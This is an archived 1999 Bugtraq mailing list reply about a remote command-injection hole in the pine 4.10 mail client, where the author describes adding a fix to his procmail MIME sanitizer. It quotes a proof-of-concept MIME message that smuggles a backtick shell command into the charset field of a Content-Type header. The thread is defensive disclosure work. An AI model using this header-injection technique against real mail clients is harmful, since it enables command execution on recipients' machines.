Bugtraq mailing list archives
Re: remote exploit on pine 4.10 - neverending story?
From: jhardin () WOLFENET COM (John D. Hardin)
Date: Mon, 8 Feb 1999 09:25:11 -0800
On Mon, 8 Feb 1999, Michal Zalewski wrote:
Hmm, but take a look at this message: ************************** MIME MESSAGE FOLLOWS ************************** From: Attacker <attacker () eleet net> To: Victim <victim () somewhere net> Subject: Happy birthday ... MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319" --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset='US-ASCII' Make a wish... --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c" Content-Transfer-Encoding: BASE64 Content-Description: wish Content-Disposition: attachment; filename="wish.c" ...it could be your last. *************************** MIME MESSAGE ENDS ***************************
Okay, I have added `` -> " conversion to my procmail MIME sanitizer. Michal, is that the only way to exploit this? Or should there be ` -> ' conversion as well? See http://www.wolfenet.com/~jhardin/procmail-security.html for details. -- John Hardin KA7OHZ jhardin () wolfenet com pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76 ----------------------------------------------------------------------- Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [ OK ] ----------------------------------------------------------------------- 101 days until Star Wars episode I
Current thread:
- Re: Cyrix bug: freeze in hell, badboy John Byrne (Feb 05)
- Re: Cyrix bug: freeze in hell, badboy Phillip R. Jaenke (Feb 05)
- HP-UX 11.0/800 patches leave suid binaries Lamont Granquist (Feb 05)
- Re: HP-UX 11.0/800 patches leave suid binaries Olle Segerdahl,D (Feb 08)
- Re: Cyrix bug: freeze in hell, badboy Ragnar Hojland Espinosa (Feb 06)
- remote exploit on pine 4.10 - neverending story? Michal Zalewski (Feb 07)
- Re: remote exploit on pine 4.10 - neverending story? Thomas Roessler (Feb 08)
- Re: remote exploit on pine 4.10 - neverending story? John D. Hardin (Feb 08)
- Possible Security Problem: Fake PGP Key Ben Laurie (Feb 08)
- ISS Internet Scanner Cannot be relied upon for conclusive Audits Mr. joej (Feb 07)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive David LeBlanc (Feb 08)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive blkadder () VALUE NET (Feb 08)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive BVE (Feb 08)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive David LeBlanc (Feb 09)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive Jim Trocki (Feb 11)
- How scanners actually work David LeBlanc (Feb 10)
- Re: ISS Internet Scanner Cannot be relied upon for conclusive David LeBlanc (Feb 08)
- Sendmail 8.9.3 Patrick Oonk (Feb 09)
- <Possible follow-ups>
- Re: Cyrix bug: freeze in hell, badboy rho (Feb 05)